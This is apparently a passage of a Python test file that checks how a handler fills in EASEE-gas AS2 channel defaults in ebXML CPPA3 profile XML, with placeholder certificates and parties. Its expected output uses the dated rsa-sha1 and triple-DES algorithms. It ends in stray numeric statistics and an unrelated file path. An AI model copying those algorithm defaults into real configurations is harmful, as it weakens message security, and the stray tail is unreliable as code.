<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_14_42">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_14_44">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A06</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_15_46">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_15_48">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A07</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_16_50">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_16_52">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A04</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_17_54">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_17_56">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
</cppa:ServiceSpecification>
<cppa:ServiceSpecification>
<cppa:PartyRole name="ZSO"/>
<cppa:CounterPartyRole name="ZSH"/>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A02</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_18_58">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_18_60">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A09</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_19_62">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A06</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_20_64">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_20_66">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A07</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_21_68">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A04</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_22_70">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
</cppa:ServiceSpecification>
<cppa:ServiceSpecification>
<cppa:PartyRole name="ZSO"/>
<cppa:CounterPartyRole name="Meter Read"/>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A02</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_23_72">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
</cppa:ServiceSpecification>
<cppa:ServiceSpecification>
<cppa:PartyRole name="ZSO"/>
<cppa:CounterPartyRole name="Mark Tr"/>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A02</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_24_74">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
</cppa:ServiceSpecification>
<cppa:ServiceSpecification>
<cppa:PartyRole name="ZSO"/>
<cppa:CounterPartyRole name="FACILITY OPERATOR"/>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A10</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_25_76">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
</cppa:ServiceSpecification>
<cppa:ServiceSpecification>
<cppa:PartyRole name="ZSO"/>
<cppa:CounterPartyRole name="StorageLNGOperator"/>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A09</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_26_78">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
</cppa:ServiceSpecification>
<cppa:ServiceSpecification>
<cppa:PartyRole name="ZSO"/>
<cppa:CounterPartyRole name="ZTY"/>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A08</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_27_80">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_27_82">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
</cppa:ServiceSpecification>
<cppa:ServiceSpecification>
<cppa:PartyRole name="ZSO"/>
<cppa:CounterPartyRole name="ZTZ"/>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A08</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_28_84">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_28_86">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
</cppa:ServiceSpecification>
<cppa:ServiceSpecification>
<cppa:PartyRole name="ZSO"/>
<cppa:CounterPartyRole name="ZTU"/>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A02</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_29_88">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_29_90">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A04</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_30_92">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_30_94">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
</cppa:ServiceSpecification>
<cppa:ServiceSpecification>
<cppa:PartyRole name="ZSO"/>
<cppa:CounterPartyRole name="ZTT"/>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A02</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_31_96">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_31_98">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A04</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_32_100">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_32_102">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
</cppa:ServiceSpecification>
<cppa:ServiceSpecification>
<cppa:PartyRole name="ZSO"/>
<cppa:CounterPartyRole name="ZTV"/>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A05</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_33_104">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
</cppa:ServiceSpecification>
<cppa:ServiceSpecification>
<cppa:PartyRole name="ZSO"/>
<cppa:CounterPartyRole name="Consumer"/>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A07</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_34_106">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
</cppa:ServiceSpecification>
<cppa:ServiceSpecification>
<cppa:PartyRole name="ZSO"/>
<cppa:CounterPartyRole name="SU"/>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A02</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_35_108">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
</cppa:ServiceSpecification>
<cppa:ServiceSpecification>
<cppa:PartyRole name="ZSO"/>
<cppa:CounterPartyRole name="ZAA"/>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A07</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_36_110">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
</cppa:ServiceSpecification>
<cppa:ServiceSpecification>
<cppa:PartyRole name="http://docs.oasis-open.org/ebxml-msg/ebms/v3.0/ns/core/200704/initiator"/>
<cppa:CounterPartyRole name="http://docs.oasis-open.org/ebxml-msg/ebms/v3.0/ns/core/200704/responder"/>
<cppa:ServiceBinding>
<cppa:Service>http://docs.oasis-open.org/ebxml-msg/ebms/v3.0/ns/core/200704/service</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/ebms/v3.0/ns/core/200704/test" id="ab_37_112">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
</cppa:ServiceSpecification>
<cppa:ServiceSpecification>
<cppa:PartyRole name="http://docs.oasis-open.org/ebxml-msg/ebms/v3.0/ns/core/200704/responder"/>
<cppa:CounterPartyRole name="http://docs.oasis-open.org/ebxml-msg/ebms/v3.0/ns/core/200704/initiator"/>
<cppa:ServiceBinding>
<cppa:Service>http://docs.oasis-open.org/ebxml-msg/ebms/v3.0/ns/core/200704/service</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/ebms/v3.0/ns/core/200704/test" id="ab_38_114">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
</cppa:ServiceSpecification>
<cppa:AS2Channel id="easeegas_as2_signal" asResponse="true">
<cppa:ChannelProfile>http://easee-gas.eu/AS2-Profile/MDN</cppa:ChannelProfile>
<cppa:Signature>
<cppa:SignatureAlgorithm>http://www.w3.org/2000/09/xmldsig#rsa-sha1</cppa:SignatureAlgorithm>
</cppa:Signature>
</cppa:AS2Channel>
<cppa:AS2Channel id="b_ch_send" transport="tr_send">
<cppa:ChannelProfile>http://easee-gas.eu/AS2-Profile</cppa:ChannelProfile>
<cppa:Signature>
<cppa:SignatureAlgorithm>http://www.w3.org/2000/09/xmldsig#rsa-sha1</cppa:SignatureAlgorithm>
<cppa:SigningCertificateRef certId="_SCNXER"/>
</cppa:Signature>
<cppa:Encryption>
<cppa:EncryptionAlgorithm>http://www.w3.org/2001/04/xmlenc#tripledes-cbc</cppa:EncryptionAlgorithm>
</cppa:Encryption>
<cppa:ErrorHandling>
<cppa:ReceiverErrorsReportChannelId>b_ch_send_signals</cppa:ReceiverErrorsReportChannelId>
</cppa:ErrorHandling>
<cppa:ReceiptHandling>
<cppa:ReceiptChannelId>b_ch_send_signals</cppa:ReceiptChannelId>
</cppa:ReceiptHandling>
<cppa:Compression>
<cppa:CompressionAlgorithm>application/pkcs7-mime</cppa:CompressionAlgorithm>
</cppa:Compression>
</cppa:AS2Channel>
<cppa:AS2Channel id="b_ch_send_signals" asResponse="true">
<cppa:ChannelProfile>http://easee-gas.eu/AS2-Profile/MDN</cppa:ChannelProfile>
<cppa:Signature>
<cppa:SignatureAlgorithm>http://www.w3.org/2000/09/xmldsig#rsa-sha1</cppa:SignatureAlgorithm>
</cppa:Signature>
</cppa:AS2Channel>
<cppa:AS2Channel id="b_ch_receive" transport="tr_receive">
<cppa:ChannelProfile>http://easee-gas.eu/AS2-Profile</cppa:ChannelProfile>
<cppa:Signature>
<cppa:SignatureAlgorithm>http://www.w3.org/2000/09/xmldsig#rsa-sha1</cppa:SignatureAlgorithm>
</cppa:Signature>
<cppa:Encryption>
<cppa:EncryptionAlgorithm>http://www.w3.org/2001/04/xmlenc#tripledes-cbc</cppa:EncryptionAlgorithm>
<cppa:EncryptionCertificateRef certId="_4UP74O"/>
</cppa:Encryption>
<cppa:ErrorHandling>
<cppa:ReceiverErrorsReportChannelId>easeegas_as2_signal</cppa:ReceiverErrorsReportChannelId>
</cppa:ErrorHandling>
<cppa:ReceiptHandling>
<cppa:ReceiptChannelId>easeegas_as2_signal</cppa:ReceiptChannelId>
</cppa:ReceiptHandling>
<cppa:Compression>
<cppa:CompressionAlgorithm>application/pkcs7-mime</cppa:CompressionAlgorithm>
</cppa:Compression>
</cppa:AS2Channel>
<cppa:HTTPTransport id="tr_send">
<cppa:ClientIPv4>1.2.3.4</cppa:ClientIPv4>
<cppa:TransportLayerSecurity>
<cppa:TLSProtocol version="1.2">TLS</cppa:TLSProtocol>
</cppa:TransportLayerSecurity>
</cppa:HTTPTransport>
<cppa:HTTPTransport id="tr_receive">
<cppa:Endpoint>https://tso1.eu/as2</cppa:Endpoint>
<cppa:TransportLayerSecurity>
<cppa:TLSProtocol version="1.2">TLS</cppa:TLSProtocol>
</cppa:TransportLayerSecurity>
</cppa:HTTPTransport>
<cppa:PayloadProfile id="edigas">
<cppa:PayloadPart maxOccurs="1" minOccurs="1">
<cppa:PartName>businessdocument</cppa:PartName>
<cppa:MIMEContentType>application/xml</cppa:MIMEContentType>
<cppa:Property maxOccurs="1" minOccurs="1" name="EDIGASDocumentType"/>
</cppa:PayloadPart>
</cppa:PayloadProfile>
<cppa:SOAPWithAttachmentsEnvelope id="entsog_package">
<cppa:SimpleMIMEPart PartName="businessdocument"/>
</cppa:SOAPWithAttachmentsEnvelope>
</cppa:CPP>
""", self.parser)
self._test_regression('0008', result, expected)
def test_0008(self):
# NOTE(review): leading indentation appears to have been stripped from this
# extract; comments are added here but all code/string lines are left
# byte-identical, since the XML fixtures are compared verbatim downstream.
logging.info('Test 0008')
# Input fixture: a minimal EASEE-gas AS2 CPP for "TSO 1" — wildcard
# PartyRole/CounterPartyRole/Service/action bound to two AS2 channels
# (ch_send/ch_receive) that carry only certificate references; no
# algorithms, signal channels, compression or TLS are spelled out yet.
data = etree.fromstring("""<cppa:CPP xmlns:cppa="http://docs.oasis-open.org/ebcore/ns/cppa/v3.0" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://docs.oasis-open.org/ebxmlcppa/cppa-3.0 file:../../../cppa3-xsd/cppa3.xsd">
<cppa:ProfileInfo>
<cppa:ProfileIdentifier>EASEE-gas AS2 Profile for TSO 1</cppa:ProfileIdentifier>
</cppa:ProfileInfo>
<cppa:PartyInfo>
<cppa:PartyName xml:lang="en">TSO 1</cppa:PartyName>
<cppa:PartyId type="http://www.entsoe.eu/eic-codes/eic-party-codes-x">21X-EU-A-A0A0A-A</cppa:PartyId>
<cppa:PartyContact>
<cppa:ContactType>Technical Contact</cppa:ContactType>
<cppa:DirectTelephone>+3791234560</cppa:DirectTelephone>
<cppa:Email>edi@tso1.eu</cppa:Email>
</cppa:PartyContact>
<cppa:PartyContact></cppa:PartyContact>
<cppa:Certificate id="_OYHRBO">
<ds:KeyInfo>
<ds:KeyName>Signing certificate for TSO 1</ds:KeyName>
<ds:X509Data>
<ds:X509Certificate>RGl0IGlzIGVlbiBjZXJ0aWZpY2FhdCBpbiBiYXNlIDY0IGNvZGVyaW5n</ds:X509Certificate>
</ds:X509Data>
</ds:KeyInfo>
</cppa:Certificate>
<cppa:Certificate id="_YE5XZF">
<ds:KeyInfo>
<ds:KeyName>Encryption certificate for TSO 1</ds:KeyName>
<ds:X509Data>
<ds:X509Certificate>RGl0IGlzIGVlbiBhbmRlciBjZXJ0aWZpY2FhdCBpbiBiYXNlIDY0IGNvZGVyaW5n</ds:X509Certificate>
</ds:X509Data>
</ds:KeyInfo>
</cppa:Certificate>
<cppa:CertificateDefaults>
<cppa:SigningCertificateRef certId="_YE5XZF"/>
<cppa:EncryptionCertificateRef certId="_OYHRBO"/>
</cppa:CertificateDefaults>
</cppa:PartyInfo>
<cppa:ServiceSpecification>
<cppa:PartyRole name="*"/>
<cppa:CounterPartyRole name="*"/>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">*</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="*" id="ab_1_2">
<cppa:ChannelId>ch_send</cppa:ChannelId>
</cppa:ActionBinding>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="*" id="ab_1_4">
<cppa:ChannelId>ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
</cppa:ServiceSpecification>
<cppa:AS2Channel id="ch_send" transport="tr_send" package="easee-gas_package">
<cppa:ChannelProfile>http://easee-gas.eu/AS2-Profile</cppa:ChannelProfile>
<cppa:Signature>
<cppa:SigningCertificateRef certId="_OYHRBO"/>
</cppa:Signature>
<cppa:Encryption/>
</cppa:AS2Channel>
<cppa:AS2Channel id="ch_receive" transport="tr_receive" package="easee-gas_package" >
<cppa:ChannelProfile>http://easee-gas.eu/AS2-Profile</cppa:ChannelProfile>
<cppa:Signature/>
<cppa:Encryption>
<cppa:EncryptionCertificateRef certId="_YE5XZF"/>
</cppa:Encryption>
</cppa:AS2Channel>
<cppa:HTTPTransport id="tr_send">
<cppa:ClientIPv4>1.2.3.4</cppa:ClientIPv4>
</cppa:HTTPTransport>
<cppa:HTTPTransport id="tr_receive">
<cppa:Endpoint>https://tso1.eu/as2</cppa:Endpoint>
</cppa:HTTPTransport>
<cppa:PayloadProfile id="edigas">
<cppa:PayloadPart maxOccurs="1" minOccurs="1">
<cppa:PartName>businessdocument</cppa:PartName>
<cppa:MIMEContentType>application/xml</cppa:MIMEContentType>
</cppa:PayloadPart>
</cppa:PayloadProfile>
<cppa:MIMEEnvelope id="easee-gas_package">
<cppa:SimpleMIMEPart PartName="businessdocument"/>
</cppa:MIMEEnvelope>
</cppa:CPP>
""", self.parser)
# Expand the CPP with the handler's registered channel-profile defaults.
result = self.handler.apply_profile_configs(data)
logging.info('Result: {}'.format(lxml.etree.tostring(result,
pretty_print=True)))
# Expected output: the same CPP with the EASEE-gas AS2 profile defaults
# filled in — rsa-sha1 signing, 3DES encryption, pkcs7-mime compression,
# generated MDN signal channels (easeegas_as2_signal_inbound/_outbound)
# wired into ErrorHandling/ReceiptHandling, and TLS 1.2 on both transports.
expected = etree.fromstring("""<cppa:CPP xmlns:cppa="http://docs.oasis-open.org/ebcore/ns/cppa/v3.0">
<cppa:ProfileInfo>
<cppa:ProfileIdentifier>EASEE-gas AS2 Profile for TSO 1</cppa:ProfileIdentifier>
</cppa:ProfileInfo>
<cppa:PartyInfo xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
<cppa:PartyName xml:lang="en">TSO 1</cppa:PartyName>
<cppa:PartyId type="http://www.entsoe.eu/eic-codes/eic-party-codes-x">21X-EU-A-A0A0A-A</cppa:PartyId>
<cppa:PartyContact>
<cppa:ContactType>Technical Contact</cppa:ContactType>
<cppa:DirectTelephone>+3791234560</cppa:DirectTelephone>
<cppa:Email>edi@tso1.eu</cppa:Email>
</cppa:PartyContact>
<cppa:PartyContact/>
<cppa:Certificate id="_OYHRBO">
<ds:KeyInfo>
<ds:KeyName>Signing certificate for TSO 1</ds:KeyName>
<ds:X509Data>
<ds:X509Certificate>RGl0IGlzIGVlbiBjZXJ0aWZpY2FhdCBpbiBiYXNlIDY0IGNvZGVyaW5n</ds:X509Certificate>
</ds:X509Data>
</ds:KeyInfo>
</cppa:Certificate>
<cppa:Certificate id="_YE5XZF">
<ds:KeyInfo>
<ds:KeyName>Encryption certificate for TSO 1</ds:KeyName>
<ds:X509Data>
<ds:X509Certificate>RGl0IGlzIGVlbiBhbmRlciBjZXJ0aWZpY2FhdCBpbiBiYXNlIDY0IGNvZGVyaW5n</ds:X509Certificate>
</ds:X509Data>
</ds:KeyInfo>
</cppa:Certificate>
<cppa:CertificateDefaults>
<cppa:SigningCertificateRef certId="_YE5XZF"/>
<cppa:EncryptionCertificateRef certId="_OYHRBO"/>
</cppa:CertificateDefaults>
</cppa:PartyInfo>
<cppa:ServiceSpecification>
<cppa:PartyRole name="*"/>
<cppa:CounterPartyRole name="*"/>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">*</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="*" id="ab_1_2">
<cppa:ChannelId>ch_send</cppa:ChannelId>
</cppa:ActionBinding>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="*" id="ab_1_4">
<cppa:ChannelId>ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
</cppa:ServiceSpecification>
<cppa:AS2Channel id="easeegas_as2_signal_inbound" asResponse="true">
<cppa:ChannelProfile>http://easee-gas.eu/AS2-Profile</cppa:ChannelProfile>
<cppa:Signature>
<cppa:SignatureAlgorithm>http://www.w3.org/2000/09/xmldsig#rsa-sha1</cppa:SignatureAlgorithm>
</cppa:Signature>
</cppa:AS2Channel>
<cppa:AS2Channel id="ch_send" transport="tr_send" package="easee-gas_package">
<cppa:ChannelProfile>http://easee-gas.eu/AS2-Profile</cppa:ChannelProfile>
<cppa:Signature>
<cppa:SignatureAlgorithm>http://www.w3.org/2000/09/xmldsig#rsa-sha1</cppa:SignatureAlgorithm>
<cppa:SigningCertificateRef certId="_OYHRBO"/>
</cppa:Signature>
<cppa:Encryption>
<cppa:EncryptionAlgorithm>http://www.w3.org/2001/04/xmlenc#tripledes-cbc</cppa:EncryptionAlgorithm>
</cppa:Encryption>
<cppa:ErrorHandling>
<cppa:ReceiverErrorsReportChannelId>easeegas_as2_signal_inbound</cppa:ReceiverErrorsReportChannelId>
</cppa:ErrorHandling>
<cppa:ReceiptHandling>
<cppa:ReceiptChannelId>easeegas_as2_signal_inbound</cppa:ReceiptChannelId>
</cppa:ReceiptHandling>
<cppa:Compression>
<cppa:CompressionAlgorithm>application/pkcs7-mime</cppa:CompressionAlgorithm>
</cppa:Compression>
</cppa:AS2Channel>
<cppa:AS2Channel id="easeegas_as2_signal_outbound" asResponse="true">
<cppa:ChannelProfile>http://easee-gas.eu/AS2-Profile</cppa:ChannelProfile>
<cppa:Signature>
<cppa:SignatureAlgorithm>http://www.w3.org/2000/09/xmldsig#rsa-sha1</cppa:SignatureAlgorithm>
</cppa:Signature>
</cppa:AS2Channel>
<cppa:AS2Channel id="ch_receive" transport="tr_receive" package="easee-gas_package">
<cppa:ChannelProfile>http://easee-gas.eu/AS2-Profile</cppa:ChannelProfile>
<cppa:Signature>
<cppa:SignatureAlgorithm>http://www.w3.org/2000/09/xmldsig#rsa-sha1</cppa:SignatureAlgorithm>
</cppa:Signature>
<cppa:Encryption>
<cppa:EncryptionAlgorithm>http://www.w3.org/2001/04/xmlenc#tripledes-cbc</cppa:EncryptionAlgorithm>
<cppa:EncryptionCertificateRef certId="_YE5XZF"/>
</cppa:Encryption>
<cppa:ErrorHandling>
<cppa:ReceiverErrorsReportChannelId>easeegas_as2_signal_outbound</cppa:ReceiverErrorsReportChannelId>
</cppa:ErrorHandling>
<cppa:ReceiptHandling>
<cppa:ReceiptChannelId>easeegas_as2_signal_outbound</cppa:ReceiptChannelId>
</cppa:ReceiptHandling>
<cppa:Compression>
<cppa:CompressionAlgorithm>application/pkcs7-mime</cppa:CompressionAlgorithm>
</cppa:Compression>
</cppa:AS2Channel>
<cppa:HTTPTransport id="tr_send">
<cppa:ClientIPv4>1.2.3.4</cppa:ClientIPv4>
<cppa:TransportLayerSecurity>
<cppa:TLSProtocol version="1.2">TLS</cppa:TLSProtocol>
</cppa:TransportLayerSecurity>
</cppa:HTTPTransport>
<cppa:HTTPTransport id="tr_receive">
<cppa:Endpoint>https://tso1.eu/as2</cppa:Endpoint>
<cppa:TransportLayerSecurity>
<cppa:TLSProtocol version="1.2">TLS</cppa:TLSProtocol>
</cppa:TransportLayerSecurity>
</cppa:HTTPTransport>
<cppa:PayloadProfile id="edigas">
<cppa:PayloadPart maxOccurs="1" minOccurs="1">
<cppa:PartName>businessdocument</cppa:PartName>
<cppa:MIMEContentType>application/xml</cppa:MIMEContentType>
</cppa:PayloadPart>
</cppa:PayloadProfile>
<cppa:MIMEEnvelope id="easee-gas_package">
<cppa:SimpleMIMEPart PartName="businessdocument"/>
</cppa:MIMEEnvelope>
</cppa:CPP>
""", self.parser)
# Canonical-compare result against expected via the suite's helper.
self._test_regression('0008', result, expected)
| 51.518397
| 167
| 0.69906
| 8,935
| 78,411
| 6.058534
| 0.043872
| 0.074114
| 0.063399
| 0.04585
| 0.978941
| 0.976835
| 0.976022
| 0.975486
| 0.974692
| 0.970092
| 0
| 0.037322
| 0.145043
| 78,411
| 1,521
| 168
| 51.552268
| 0.770175
| 0.000344
| 0
| 0.956728
| 0
| 0.144016
| 0.931717
| 0.373335
| 0
| 0
| 0
| 0
| 0
| 1
| 0.007437
| false
| 0.000676
| 0.003381
| 0
| 0.011494
| 0.007437
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
c3f79012b5a1ab62844408dbc08ab7a6343af85a
| 2,726
|
py
|
Python
|
pcat2py/class/21064964-5cc5-11e4-af55-00155d01fe08.py
|
phnomcobra/PCAT2PY
|
